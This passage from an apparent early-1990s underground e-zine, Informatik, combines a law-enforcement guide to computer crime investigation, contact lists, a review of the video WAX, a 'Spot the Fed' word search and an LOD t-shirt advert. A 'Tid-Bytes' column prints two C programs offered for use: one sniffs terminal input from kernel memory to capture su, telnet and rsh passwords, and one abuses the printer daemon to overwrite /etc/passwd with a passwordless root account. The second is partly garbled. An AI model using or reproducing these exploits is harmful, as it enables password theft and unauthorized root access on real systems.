other systems and that their activities are not illegal since the companies can afford the losses. On the other hand, as one investigator observed, the hackers of today may be the sophisticated computer criminals of tomorrow. It is therefore important to set a lesson early in their careers steering them away from these offenses. Public Sector Computer Crime Associations ----------------------------------------- Federal Computer Investigations Committee (FCIC) c/o U.S. Secret Service Fraud Division, Room 942 1800 G Street, N.W. Washington, D.C. 20223 Phone: (202) 535-5850 Steve Purdy This committee is compromised of representatives from federal military and civilian law enforcement. This organization meets three times a year for the purpose of enhancing techniques to investigate computer related crimes. The committee strives to develop universal guidelines for these types of investigations. Membership is diverse (U.S. Secret Service, IRS,FBI,Department of Defense, CID, AFOSI, NIS, Department of Labor, and others) High Tech Crime Investigator's Association (HTCIA) c/o L.A. County Sheriff's Department (Forgery/Fraud Detail) 11515 South Colima Road, Rm. M104 Whittier, California 90604 Phone: (213) 946-7212 Jim Black- President Members include federal, state and local law enforcement personnel as well as security managers from private industry. The association brings together private industry and law enforcement officials in order to educate each other about computer related crimes. Colorado Association of Computer Crime Investigators c/o Larry Scheideman Lakewood Police Dept. Lakewood, Colorado 80226-3105 Phone: (303) 987-7370 Founded: 1986 A professional organization including federal, state, and local law enforcement personnel and those persons from the private sector concerned with computer crime. The association assists law enforcement agencies with resource allocation and intelligence/investigation of computer related crimes. The association also provides training on an individual basis. Law Enforcement Electronic Technology Assistance Committee (LEETAC) Office of the State Attorney 700 South Park Avenue Titusville, Florida 32781 Phone: (407) 269-8112 Jim Graham The organization is comprised of 10 prosecutors from the State's Attorney's office, 13 officers representing each municipality in the county, 2 representatives from the sheriff's department, and Nassau. They provide technical expertise to law enforcement regarding computer crimes. International Association of Credit Card Investigators (IACCI) 1620 Grant Avenue Norato, California 94945 Phone: (415) 897-8800 D.D. Drummond Executive Director Founded: 1968 Members: 2700 Special agents, investigators, and investigation supervisors who investigate criminal violations of credit card laws and prosecute offenders; law enforcement officers, prosecutors or related officials who investigate, apprehend and prosecute credit card offenders. The association's objective is to aid in the establishment of effective credit card security programs; to suppress fraudulent use of credit cards; and to detect and proceed with the apprehension of credit card thieves. Economic Crime Investigators Association (ECIA) Glendale Police Dept. 7119 N. 57 Drive Glendale, Arizona 85301 Phone: (602) 931-5511 Wayne Cerow Members include law enforcement and regulatory personnel. The association focuses on economic crime, including computer related crimes. The association holds a yearly training seminar in order to exchange information, ideas and data on new technological advances. Institute of Internal Auditors (IIA) 249 Maitland Avenue Altamonte Springs, Florida 32701 Phone (407) 830-7600 Founded: 1941. Members: 30,000. Staff: 74 Local Group: 183 Professional organization of internal auditors, comptrollers, accountants, educators and computer specialists. Individual members have assisted both state/local police with investigations involving computer crime. Computer Law Association, Inc. 8303 Arlington Boulevard, Suite 210 Fairfax, Virginia 22031 Phone: (703) 560-7747 Founded: 1973. Members 1200. Lawyers, law students, and others interested in legal problems related to computer communications technology. The association sponsors continuing legal education on computer law. CLA also publishes a reference manual which lists organizations involved with computer law. Communications Fraud Control Association (CFCA) P.O. Box 23891 Washington, D.C. 20026 Phone: (703) 848-9760 Rami Abuhamdeh (executive director) A security organization involved in investigations of telecommunications fraud. Membership includes (a) individual and corporate, (b) associate individual, and (c) vendor. National Center for Computer Crime Data (NCCD) 2700 North Cahuenga Boulevard Los Angeles, California 90068 Phone: (213) 874-8233 Jay BloomBecker (director) Founded: 1978. The center disseminates data and documents in order to facilitate the prevention, investigation and prosecution of computer crime. The center sponsors speakers and seminars. The center is also involved in conducting research and compiling statistics. Mis Training Institute Information Security Program 498 Concord Street Framingham, Massachusetts 01701 Phone: (508) 879-7999 Information security seminars for information security professionals, EDP auditors, and data processing management. The institute provides both training and consulting services, and has assisted local police in investigations of computer-related crimes. Computer Virus Industry Association 4423 Cheeney Street Santa Clara, California 95054 Phone: (408) 988-3832 John McAfee (Executive director) Founded: 1987. Objective is to help identify, and cure computer viruses. The association has worked with state and local law enforcement agencies in the investigation and detection of computer related crimes. Information Systems Security Association (ISSA) P.O. Box 71926 Los Angeles, California 90071 Phone: (714) 863-5583 Carl B. Jackson Founded: 1982. Members: 300. Computer security practitioners whose primary responsibility is to ensure protection of information assets on a hands-on basis. Members include banking, retail, insurance, aerospace, and publishing industries. The association's objective is to increase knowledge about information security. ISSA sponsors educational programs, research, discussion, and dissemination of information. The association has regional and state chapters. SRI International Information Security Program 333 Ravenswood Avenue Menlo Park, California 94025 Phone: (415) 859-2378 Donn B. Parker Founded: 1947. A staff of senior consultants and computer scientists preform research on computer crime and security and provide consulting to private and government clients worldwide. A case file of over 2,500 computer abuses since 1958 has been collected and analyzed. It is available for use by criminal justice agencies and students FREE of charge. An electronic bulletin board, Risks Forum, is operated and sponsored by the Association for Computing Machinery to collect and disseminate information about risks in using computers. List of addresses for more Computer Crime information ----------------------------------------------------- Mr. Anthony Adamski, Jr. Federal Bureau of Investigation Financial Crimes Division Room 3841 10th Street and Pennsylvania Avenue,N.W. Washington, D.C. 20535 (202) 324-5594 Mr. James R. Caruso AT&T Corporate Security Room 4B03 20 Independance Boulevard Warren, NJ 07060 (201) 580-8304 Mr. J. Thomas McEwen Institute for Law and Justice, Inc. 1018 Duke Street Alexandria, VA 22314 (703) 684-5300 Mr. Ken McLeod 504 Edison Avenue Buckeye, AZ 85326 (602) 935-7220 Sergeant William F. Nibouar Technical Crimes Investigation Maricopa County Sheriff's Office 102 West Madison Phoenix, AZ 85003 (602) 256-1000 Mr. Donn B. Parker SRI International 333 Ravenswood Avenue Menlo Park, CA 94025 (415) 859-2378 Mr. James Fitzpatrick Assistant District Attorney Philadelphia District Attorney's Office Economic Crimes Section 1421 Arch Street Philadelphia, PA 19102 (215) 686-8735 Detective Calvin Lane Computer Crime Unit Baltimore County Police Department 400 Kenilworth Avenue Towson, MD 21204 (301) 887-2225 Detective Larry L. Scheideman Intelligence Division Lakewood Police Department 445 South Allison Parkway Lakewood, CO 80026-3105 (303) 987-7370 BBS (303) 987-7388 1200 baud no parity and 1 stop bit Mr Jonathan Budd, Project Monitor National Institute of Justice 633 Indiana Avenue, N.W., Room 801 Washington, D.C. 20531 (202) 272-6040 Special Agent Stephen R. Purdy United States Secret Service Fraud Division 1800 G Street, N.W. Washington, D.C. 20223 (202) 535-5850 These people were major contributors to these books Advance Preparations and the Actual Search ------------------------------------------ I. Investigative Techniques A. Record Checks: 1. Attempt to learn as much information about the personal computer owner as possible, such as: a. Number of occupants in the private residence and their relationships. b. Employment and educational background to determine which resident is likely to be a computer user. 2. Review telephone records: a. Often computer sites have multiple lines (e.g., one for the bulletin board operation, one for outbound data traffic, and one for voice . b. Long-distance dialing company records are valuable for determining long-distance access code abuse. B. Informants: 1. Use the informant to acquire evidence before a search warrant is prepared. 2. Use the informant to better understand the computer habits, skills, and knowledge of the suspect; identify: a. Time of operation of target computer. b. Nature and frequency of illegal activity. c. Type of computer system used by the suspect. d. Identity of criminal associates or conspirators. e. Occupations and employers of suspects and other people on the premises. C. Surveillance of computer facilities D. Pen register or dialed-number recorder (DNR): 1. If telephone access codes are being abused, use pen registers or DNRs to gather documentation. Frequently, a prosecutable case is made through the application of this technique alone. 2. Use this technique to obtain additional criminal intelligence on additional suspects, target computer systems, and the extent of computer use. E. Undercover computer communications with targeted system and suspects: 1. Consider setting up an electronic bulletin board operation or attractive host computer that the suspect can access or attack. However, this method is costly and requires a substantial commitment of personnel to monitor the operation. 2. If the suspect maintains his own electronic bulletin board, consider the feasibility of using a computer to gain access to his system within the provisions of the Electronic Communications Privacy Act of 1986 (PL 99-508). Frequently,suspects allow others to access their systems, which may contain unauthorized credit card information, hacking data, and access code files. Consider consensual use of an informant's access to the suspect's computer system. F. Monitoring of computer transmissions G. False computer data base entries as an investigative tool: 1. Credit bureaus and credit card issuers frequently allow false information to be "planted" in their data bases for law enforcement use. 2. If the suspect uses this information, the investigator can collect evidence through computer audit trails. II. Supplies Needed to Execute a Search of a Personal Computer Site A. Diskettes or portable data storage units: 1. Be prepared to copy files for temporary storage unto 5-1/4", 3-1/2", or 8" diskettes. Up to 100 diskettes may be needed for large storage devices of 50 megabytes or more. Diskettes should be preformatted to avoid contamination when the suspect's computer is used. 2. Have a sufficient supply of tape cartridges. Some compute systems include cartridge-tape decks used for mass storage backup of hard disk information or individual program storage. 3. Have plenty of evidence tape, adhesive labels, or some other means of write protecting the disks. 4. Have a set of utility computer programs for target computers to retrieve data files. B. Adhesive colored labels for use in identifying and cataloging evidence (usually supplied with new diskettes): 1. Place labels on diskette copies specifying the access commands,the operating system name in which the disk is formatted, perhaps the program application used to create the data, and the case or file number of the investigation. 2. These labels are distinctly different from evidence labels d suspect is cooperative and identifies diskettes containing incriminating information, write protect them, then review them on site, and print one or two of the incriminating files. At this point, print only enough to establish the basis for the violation. If several diskettes are to be examined, label them appropriately. 2. If the suspect is not cooperative, attempt to identify diskettes that may contain incriminating information by examining the suspect's diskette labels. If the questionable diskettes are located, write protect them and print the directory of each diskette, and the contents of a questionable file. Again, if a number of diskettes are to be examined, label them. 3. Show the printout to the suspect, after he has been properly advised of his rights, for possible use in obtaining a confession. 4. If no further review of the diskettes is nessecary on site assemble and secure computer programs and documentation (much of it may be pirated) for inventory and transport to a storage site. D. Label the cables connecting various devices to aid in the reassembly of the system at a later time. E. Photograph the labeled equipment and cables. F. Disassemble, tag, and inventory the equipment. G. Carefully pack seized devices in suitable containers for transport. VI Reassembling System at a Remote Location A. Write-protect all diskettes prior to review, which preserves the integrity of the evidence examination process and prevents erasing or accidental damage to information on the seized diskettes during the review process. B. Review all seized diskettes. 1. Create a diskette log containing the following headings: "Diskette Number,""Contents," and "Disposition." 2. Using colored adhesive labels, label each diskette with a letter of the alphabet, followed by a numeral sequentially assigned to each diskette reviewed (e.g., a-1.a-2.a-3). The letter could correspond to the room where the diskette was located, or it may correspond to one of many suspects in a case, for example. 3. Review each diskette and enter its assigned number on the diskette log. 4. Under the "Contents" column of the log, briefly describe the diskette contents (e.g., games,credit card information, access code files). 5. Print a directory of the diskette and label the printout with an adhesive label bearing the same alphanumeric designation as the diskette. 6. Determine from the directory which files listed are to be reviewed. 7. Review questionable files for incriminating information or copyright violations. 8. If incriminating information is located, print the file contents and label the printout with an adhesive label bearing the same alphanumeric designation as the diskette and the directory printout. 9. Copy the incriminating files onto a formatted blank diskette established by the reviewing person specifically for that purpose. Label it appropriately as a copy for backup purposes. 10. Enter in the "Disposition" column of the diskette log the action taken with respect to the diskette (e.g., directory printed,files printed, incriminating information obtained, file copied). 11. Do not be in a hurry. Although extremely time consuming and tedious, this process is essential for preserving evidence and locating it easily during a court case. C. Review printouts seized on site and those printed from review of computerized information to determine the appropriate investigative follow-up D. Store original diskettes in a safe location, free from magnetic fields, excessive humidity, or severe temperatures. E. If the suspect has placed the information on the diskette using some type of commercial program package (e.g., D-base III, Lotus), copy the target or incriminating file onto a separate diskette.Then, and only then, should any attempt be made to manipulate the information in the file to a readable or usable format.Even then, the copy of the file should be used and not the original data. F. Some of the suspect's critical files may be encrypted, which would be shown a strings of meaningless characters. If so, attempt to locate the encryption program or security plug-in circuit board and description manuals. Attempting to break the code without the key will be fruitless unless the crypto- algorithm is extremely simple. If the most well known crypto algorithm DES (Digital Encryption Standard) was used and a clear text and a matching encrypted text is available where the secret key was used, a competent cryptoanalyst could discover the key using several hours of a Cray 2 computer (the fastest available) but at a great expense. G. File subdirectories and files may be stored in a "hidden" status or "erased" but still present on the disk. Use commercial utility programs that can search for and obtain files of this nature. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "WAX or the discovery of television among the bees" This is information on a new full length film created with new techniques destined to make it a pilot for a new breed of cyber-cinema. It was contributed by the film's creator, David Blair. CONTACT: David Blair P.O. Box 174, Cooper Station, New York, NY 10276 (212) 228 1514 "WAX or the discovery of television among the bees" is set in Alamogordo, New Mexico (1983), where the main character, Jacob Maker, designs gunsight displays at a flight simulation factory. Jacob also keeps bees. His hives are filled with "Mesopotamian" bees that he has inherited from his grandfather. Through these bees, the dead of the future begin to appear, introducing Jacob to a type of destiny that pushes him away from the normal world, enveloping him in a grotesque miasma of past and synthetic realities. The bees show Jacob the story of his grandfather's acquisition and fatal association with the "Mesopotamian" bees, in the years following the First World War. The bees also lead Jacob away from his home, out to the Alamogordo desert, slowly revealing to him their synthetic/mechanical world, which exists in a darkness beyond the haze of his own thoughts. Passing through Trinity Site, birthplace of the Plutonium bomb, Jacob arrives at a gigantic cave beneath the desert. There, he enters the odd world of the bees, and fulfills his destiny. Traveling both to the past and the future, Jacob ends at Basra, Iraq, in the year 1991, where he meets a victim that he must kill. Independently executed over six years, "WAX or the discovery of television among the bees" combines compelling narrative, in the realistic/fantastic vein of Thomas Pynchon or Salman Rushdie, with the graphic fluidity of video technique. The result is an odd, new type of story experience, where smooth and sudden transpositions of picture and sound can nimbly follow and fuse with fantastical, suddenly changing, and often accelerated narrative. The result resembles story-telling in animated film. Yet location photography and archive research form the backbone of the piece. "WAX or the discovery of television among the bees" (85:00, mono) provides an example of a new type of independent "electronic cinema" that will become more common as the 1990's progress. Review for "WAX or the discovery of television among the bees" from the magazine "MONDO 2000" (to be printed in Volume 7 in August 1992) article by Richard Kadrey Throughout the history of the film biz there have been occasional attempts to shoot whole novels. The silent era gave us Greed, a 12-hour misery-fest that was ultimately chopped up and sold as guitar picks by the studio heads. Fassbinder was more successful with his 15-hour Berlin Alexanderplatz, but that was shown in installments on TV, so the accumulation of action and information was greatly diminished. In the literary world, J.G. Ballard experimented with "condensed novels" in his book The Atrocity Exhibition. The idea was to boil away all character and plot and leave just the steaming residue of motive, action and response, to create the cumulative effect of novel-like density in just a few pages. David Blair's video, WAX or the Discovery of Television Among the Bees, is sort of a combination of these earlier experiments, and yet is something wholly new. Through a combination of archival film footage, new video and computer animation WAX achieves the effect of a novel (density, the passage of time, dramatic changes in character), and it does so in the 85 minute running-time of a regular feature film. It's almost impossible to describe the plot of WAX; it's a Zen koan told as a Burroughs cut-up. We open with experimental cinematographer James Maker, a member of the Supernormal Film Society who accompanies a British Royal expedition to Antarctica in hopes of filming the spirits of the dead. Flashfoward to James Maker's grandson, Jacob Maker, a computer programmer working on targeting systems for the Air Force at their Alamagordo test range. Jacob keeps bees, the bees that once belonged to his father and grandfather, a semi-famous keeper of bees himself, friend of the man who first imported Mesopotamian bees to England. Jacob grows unsure of the work he is doing for the Air Force, telling us that "To hit a simulated target was to prepare murder against a real target." As his uncertainty grows, he spends more and more time with the bees. He has blackouts; time turns liquid, and he loses hours at a time. The hives are endlessly fascinating to him. And then one day, he thinks he can hear voices speaking to him from inside the hives. . . . After that, Jacob quickly leaves behind almost everything we would consider normal life and embarks on a Ballardian quest that takes him from his home in Alamagordo, to Trinity site (location of the first nuclear bomb was detonation, coincidentally on the day of Jacob's birth), to the underground lair that is the real home of the bees (where the bees commune with the dead, and prepare new bodies for them), to the Land of the Dead itself and to Iraq during the Gulf War where Jacob is reborn briefly as a bomb, guiding himself with the same targeting system he worked on back when he was a programmer. Blair labored for six years to finish WAX, working when he could from grant to grant, scrounging and convincing people to contribute to the project through the force of his vision, the strength of which is evident in the extraordinary production quality of WAX. The scenes set in Alamagordo and Trinity Site were really filmed at those locations. Blair convinced the Air Force to let him take his video crew deep inside the highly restricted WSMR bomb range. On the day Blair and company were shooting, a celebration was on nearby, an annual party marking the anniversary of the first nuclear bomb test. Technicians set off a small chemical explosive, sending up a tall, white mushroom cloud, a moment captured by chance by cinematographer Mark Kaplan, and incorporated by Blair into the finished film. Stealth bombers practiced bomb runs over the shooting site, using the Trinity marker as ground zero on their targeting grids-- Blair and his crew were being virtually bombed the whole time they were filming. Another striking sequence in WAX is the underground cavern where the bees make wax bodies for the dead to inhabit. Blair shot these scenes in off-limit locations inside Carlsbad Caverns, conning and cajoling his way into sectors of cave that even the park rangers generally avoid. It's during this act that Jacob enters the Land of the Dead, and the audience gets a tour of the afterlife via Florence Ormezzano's lovely computer graphics. WAX neatly avoids the problems of mainstream films like Lawnmower Man where films and effects live and die by their flash quotient. WAX refuses to compete with Hollywood's ideas of special effects. The computer images we get are startling, from the bat-winged and multi-skulled spirit guide to the biomorphic squiggles that are the alphabet of the dead. These are dream images from a lost digital tribe, pixelated runes and hieroglyphs. Imagine what the Maya might have left behind if they had vanished into a virtual world instead of the Mexican jungle. WAX is the first generation of a new video-based artform that Blair calls is "independent electronic cinema." Like home-recording studios and the zine world (like the zine you hold in your hands) recent advances in technology have put powerful editing tools into the hands of anyone with the need and desire to use them. WAX was assembled using the Montage Picture Processor, a relatively new "non-linear" video editing system, which allowed Blair to work quickly and intuitively, digitally cutting and pasting the work together from as many as six video segments at once. Both Blair and WAX, however, are having to pay a price for their ambition. Nobody wants to show or distribute WAX. The art video crowd has rejected it because it's too long and too expensive, a PC no-no. The film community is strictly hands-off because WAX is video-based. This is almost always the fate of the new. Tuxedoed and tiaraed royals rioted at the premier of the Rite of Spring. Henry Miller, Allen Ginsberg and Burroughs were all banned at one time for obscenity. And the Elvis was shot from the waist up because white boys weren't supposed to move like that. And who can really blame the critics? The New is always frightening. It makes you look at everything, your own work included, in a different way. It makes you question your methods, your ideas, all your assumptions. Worse, the New can make you feel old, and when you're in art, where coolness and affect are half the game, old is not where the beautiful people are hanging out. Blair is optimistic, though. With praise from the likes of William Gibson, he knows that he accomplished want he set out to do. He's already at work on a new feature, an alternate history piece linking the fate of the modern Japanese and Jews in an alternate Israel located in Manchuria. Not exactly the kind of material destined to give Terminator 9 a run for its money, but Blair is playing in a different league, where film has the density of a novel, where new thoughts are always welcome and where memories, dreams and desires are as close as your skin, and as dangerous as a smart bomb. TECHNICAL PROFILE: "WAX or the discovery of television among the bees" demonstrates the narrative and visual forms that are emerging as the wide availability of new technologies make possible an independent "electronic cinema". Though the specific combination of story, production work, post-production work, and sound design that make up "Wax..." are unique, there is no doubt that the increased availability of the technologies used in this project will lead to the creation of new ways of making feature- length narrative, at which time "Wax..." will become an example of a type, rather than an idiosyncratic phenomena. ELECTRONIC PRODUCTION: High quality video production is already an established fact. As has often been noted, the ability to shoot cheaply allows a director the ability to sketch out story ideas, even under the pressures of location production. Over fifty hours of location material were recorded for "Wax...". There were three production periods, totalling twenty days, spread over three years. The location work included travel to the a sculpture garden in central Kansas, and to a wide variety of locations in Southwestern New Mexico, including such restricted areas as the White Sands Missile Range, and the Carlsbad Caverns. The ease of video duplication aided in stock footage collection. In addition, small format video allowed the collection of archive footage during travel. ELECTRONIC POST-PRODUCTION: NON-LINEAR EDITING The mass of material collected during video production and created during video and computer effects work (see below) is difficult to organize and edit. This bottle-neck was overcome by the extensive use of non-linear editing during off-line. "WAX or the discovery of television among the bees" is the first long- form independent production to fully exploit the capacities of this new technology. Organization of production material began early on at Film/Video Arts, a non-profit media access center in NYC, where simple 3/4" editing equipment was used. This work was shifted home when, in the course of the production, inexpensive home editing equipment became available. A thermal video printer allowed simple sorting and cataloguing of shots. After the final shoot, all organized material was input to a Montage non-linear editing system, where the real work of off- line editing began. More than 1800 hours were spent on this system. Non-linear editing allows an editor to instantly rearrange, trim or lengthen all shots within a sequence, while previewing simple opticals. On such a system, a director can work at the levels of shot, sequence, and scene simultaneously, allowing both the complete exploitation of large amounts of production material, and the opportunity for associative patterning at all levels. Off-line editing acquires both the speed and creative flexibility of writing. "WAX or the discovery of television among the bees" is a clear example of this new functionality. ELECTRONIC POST-PRODUCTION: VIDEO GRAPHICS/COMPUTER GRAPHICS As is already obvious in short-form work such as the television commercial and music video, the combination of electronic post- production with computer graphics allows a director both complete control over production material, and the ability to integrate this footage with completely synthetic material, in an artificial graphic space. "WAX or the discovery of television among the bees" is the first independent production to harness these technologies for fiction-feature storytelling. Effects production began simultaneous with the initial production and editing work. More than forty hours of processed material were recorded, using a wide variety of image processing and image synthesis techniques. These ranged from frame-based PC work, both 2-D and 3-D, to the real-time work, initially executed on analog voltage-control systems at the Experimental Television Center in Owego, N.Y. Of special interest is the fact that a simple Amiga-based system was used to create over 90 minutes of 3-D animated elements. In the final tape, there are several long sequences of narrative 3-D animation, totalling almost ten minutes. Both the PC work, analog work, and the majority of the production material were fed through a real-time 2-D/3-D joy- stick controlled, key-frame based device called Impact, from Microtime. The machine was loaned to the production by the manufacturer for 24 days, and installed at Film/Video Arts, NY. The extraordinary plastic qualities of this easily programmed device provided, within the shot, the same compositional flexibility that the non-linear editing system provided across shots. ELECTRONIC POST-PRODUCTION: MUSIC At the completion of editing, the finished picture was given to the composers, devoid of any production or stock sound. All eighty-five minutes of sound were created from scratch by the pair, using samplers and other computer-based instruments at their PC-automated audio-for-video studio. The inexpensive, yet powerful, technologies of contemporary music allow the independent composer/sound designer to create long-form works with a speed and sophistication previously not possible. INDEPENDENT "ELECTRONIC CINEMA" At the current time, "WAX or the discovery of television among the bees" is an unusual, perhaps idiosyncratic project, in the style, content, and length of its' narrative, and in its' visual composition. However, these elements have proceeded in unity with, and in many cases have been born from, the technical aspects of its construction. It should be noted that, as the 1990's progress, real-time 2-D and 3-D image processing and synthesis will become available in affordable desktop computers. Inexpensive non-linear, PC-based editing systems will replace cassette-based, mechanical systems. These new technologies, combined with the already established practices of video production and PC-based electronic music, will be the material basis for a new "electronic cinema". As a wide range of producers gain the ability to investigate this possibility, what is unusual here may become common. Distribution for "WAX or the discovery of television among the bees" is planned both on tape and on film. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ -/- -/- /-/ *> TID-BYTES <* /-/ -/- -/- /-/ by the Informatik Staff /-/ -/- -/- /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ Tid-Bytes is a standing column of miscellaneous bits of information. This issue brings us a wordhunt, more info on those LOD t-shirts, and some C-programs that I am sure will be of use to you Unix explorers. "Spot the Fed!" -by the staff- Hiding out below are all sorts of undesirables. Search behind every two-way mirror, potted plant, and light fixture (as well as diagonally, backwards, and forwards) to locate them and the other terms listed below. [Thanks to KL, TK, Vodka, Holistic, and everyone else...] Wordlist ~~~~~~~ Klupfel - Henry Klupfel, Bellcore Ames - Toni Ames, our buddy at Sprint Maxfield - John Maxfield, in charge of several sting operations Meola - Ralph Meola, AT&T Foley - Tim Foley, Secret Service Delaney - Donald Delaney, New York State Police, senior investigator Clifford - Cliff Stoll, the cukoo, easy to spot, look for the hair Geraldo - Geraldo Rivera, some sort of alien plague Dale - Dale Drew, Tymnet Security Thackeray - Gail Thackeray, Arizona prosecuter Cook - William Cook, (ex)US prosecutor Parker - Don Parker, security consultant CERT - The Computer Emergency Response Team Patrick - Patrick Farmer, Visionary, High-level informant BellCore - bringing us new technology to explore Sprint - Always tough ATANDT - AT&T, quality you can depend on confiscation - the game the feds are playing when they take your stereo away RedBox - discount payphone device informer - a narc, not a real popular buddy phreak - a telecom enthusiast probation - What you hope you get jailtime - What you hope NOT to get sting - a setup, the reason you don't leave your real info raid - a friendly wakeup call busted - gone down in history arrest - you get to ride in a police car! fraud - just a white lie hacker - the root of all evil warrant - "Warrant? We don't need no stinking warrants..." magnum - popular device used to hold dangerous hackers at bay police - do I smell bacon? agents - friendly guys that don't know anything but have nice sunglasses feds - big brother's helpers officers - they protect and serve SunDevil - The infamous operation Sun-Devil Zardoz - CERT advisory compilations cracker - politically correct term for hacker ___________________________________ | | | Spot The Fed! | | | +---------------------------------+ | | | t t m a g e n t s b a t y w m | | r d d i e s m a g n u m n a e | | s c d n r g n i t s d s e t o | | p a e r a k n y n r d a t s l | | r n l l l t e d a s e e p e a | | i o a r d l a l r j a k f r d | | n i n f o r m e r a d p c r r | | t t e f e e c i a i u e o a s | | h a y c o i r f w l r f d s h | | a b o u f f a x k t f k u o p | | c o n f i s c a t i o n a h a | | k r o d e r k m l m d c r o y | | e p o l i c e c r e i e f d r | | r p a r k e r b v z a r d o z | | a d a p a t r i c k r m c r c | | y c i b e l l c o r e d b o x | | | +---------------------------------+ --------------------- LOD Shirts by Erik Bloodaxe With all the amazing hullabaloo going on in several newsgroups and throughout the electronic community as a whole, I have decided to go ahead and make one more, FINAL, print run on the LOD t-shirts. Please, if anyone is interested, have your mail sent by the end of July, so everyone who wants one can get one this time. I thought that in the 6 print orders I made previously "Everyone" who wanted one got one, but from the requests I have received apparently not. I was amazed at the orders that came in from locations such as Hong Kong, England, Netherlands and Australia. The list of luminaries who came out of the woodwork with an interest in such item was equally as impressive, security types at LLNL, government employees, hackers from the golden days, and even a certain regular contributor to a few "not for normal distribution" mail lists. This run is for those of you who got left out. Again, I urge that you respond before July 31, as that is when it the opportunity ends forever. Blatant promotion follows: "LEGION OF DOOM--INTERNET WORLD TOUR" T-SHIRTS! Now you too can own an official Legion of Doom T-shirt. This is the same shirt that sold-out rapidly at the "Cyberview" hackers conference in St. Louis. Join the other proud owners such as Lotus founder Mitch Kapor and award-winning author Bruce Sterling by adding this collector's item to your wardrobe. This professionally made, 100 percent cotton shirt is printed on both front and back. The front displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. This T-shirt is sold only as a novelty item, and is in no way attempting to glorify computer crime. Shirts are only $15.00, postage included! Overseas add an additional $5.00. Send check or money-order (No CODs, cash or credit cards--evenrd) made payable to Chris Goggans to: Chris Goggans 5620 Glenmont #P-17 Houston, TX 77081 --------------------- Unix C-goodies from cdmorgan For you *nix explorers out there, here's a couple of interesting programs for you to look at. They are untested, so have at it! PROG1: /* when run from a shell-escape in /bin/mail, this program is able to read any password given to su, telnet, rsh by any user. Works on Ultrix 4.0-4.2 with no mods */ #include <stdio.h> #include <machine/pte.h> #include <sys/param.h> #include <sys/dir.h> #include <sys/user.h> #include <sys/proc.h> #include <sys/conf.h> #include <sys/tty.h> #include <nlist.h> #include <pwd.h> static int kmem = -1, mem = -1 ; struct nlist nlst[] = { { "_pt_tty" }, { NULL } } ; init() { kmem = open("/dev/kmem",0) ; mem = open("/dev/mem", 0) ; } void getkval(unsigned long offset, int *ptr, int size) { lseek(kmem, (long)offset, 0) ; read(kmem, (char *)ptr, size) ; } main() { int tty, ntty=9, i, j, k, bytes, oleng=0 ; struct tty *tbase, *tt ; char ptr[4096], old[4096] ; init() ; (void) nlist("/vmunix", nlst) ; getkval(nlst[0].n_value, (int*)(&tty), sizeof(tty)) ; tbase = (struct tty*)malloc(bytes=ntty*sizeof(struct tty)) ; for (;;) { getkval(nlst[0].n_value, (int*)tbase, ntty*sizeof(struct tty)) ; for (j=0,tt=tbase;j<ntty;j++,tt++) { if (tt->t_rawq.c_cc) { getkval((unsigned long)tt->t_rawq.c_cf,(int*)ptr,tt->t_rawq.c_cc); if ((oleng>tt->t_rawq.c_cc)&& (!strncmp(old,ptr,tt->t_rawq.c_cc))) { for(k=0;k<(oleng-tt->t_rawq.c_cc);k++) putchar(0x10) ; printf("\"") ; } else if (strncmp(old,ptr,oleng)||(oleng==0)) { printf("\n%5d (%1d) \"",tt->t_pgrp,i) ; for(i=0;i<tt->t_rawq.c_cc;i++) printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ; printf("\"") ; } else if (strncmp(old,ptr,tt->t_rawq.c_cc)) { putchar(8) ; for(i=oleng;i<tt->t_rawq.c_cc;i++) printf("%c",((ptr[i]<32) ? '.' : ptr[i])) ; printf("\"") ; } strncpy(old,ptr,oleng=tt->t_rawq.c_cc) ; fflush(stdout) ; } } } } PROG2: /* This will overlay /etc/password with a string that emulates a root account with no password. the first strlen(replacement-string) bytes will be overlayed */ #include <sys/types.h> #include <sys/socket.h> #include <sys/un.h> #include <stdio.h> struct sockaddr_un from = { AF_UNIX, "/dev/printer" }; char bufload[1024]; char buf[1024]; main(argc, argv) char **argv; { int fromfile, loadlen, count, s; unsigned char c; /* load up buffer with passwordless root account */ sprintf(bufload, "root::0:1:Operating with no password:/:/bin/csh\nnobody:*:-2:-2:No Body:/:\n"); loadlen=strlen(bufload); STREAM, 0)) < 0) { fprintf(stderr, "Error openning socket.\n"); exit(1); } if(connect(s, &from, strlen(from.sun_path) + 2) < 0) { fprintf(stderr, "Error connecting socket.\n"); exit(1); } /* lp must be a valid printer destination */ write(s, "\2lp\n", 4); read(s, &c, 1); if(c) { fprintf(stderr, "Error %d on queuejob.\n", c); exit(1); } /* give alternitive spooling file */ sprintf(buf, "\3%ld /etc/passwd\n", loadlen); write(s, buf, strlen(buf)); read(s, &c, 1); if(c) { fprintf(stderr, "Error %d on /etc/passwd creation.\n", c); exit(1); } /* write out new root password entry */ write(s, bufload, loadlen); write(s, "", 1); read(s, &c, 1); if(c) { fprintf(stderr, "Error %d after overwrite.\n", c); exit(1); } /* bogus data file entry */ sprintf(buf, "\3%ld %s\n", 10L, "dfA000xxxxxxxxx"); write(s, buf, strlen(buf)); read(s, &c, 1); if(c) { fprintf(stderr, "Error %d on df file\n", c); exit(1); } write(s, "xxxxxxxxxx", 10); write(s, "", 1); read(s, &c, 1); if(c) { fprintf(stderr, "Error %d at last overwrite.\n", c); exit(1); } exit(0); } - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Informatik Submission & Subscription Policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Informatik is an ongoing electronic journal, and thus we are faced with the ever present need for a steady influx of new material. If you have an area of interest or expertise that you would like to write about, please do not hesitate to contribute! We depend on reader submissions!! We do ask that any submissions fit the following guidelines... General Content ~~~~~~~~~~~~~~ Material for Informatik should concern information of interest to the computer underground community. Examples of this include, but are by no means limited to hacking and phreaking, governmental agencies, fraud, clandestine activity, abuse of technology, recent advances in computing or telecommunications technology, and other of information not readily available to the public. Please include a title and author name. Text Format ~~~~~~~~~~ * standard ASCII test * 79 characters per line * no TAB codes * no special or system specific characters * 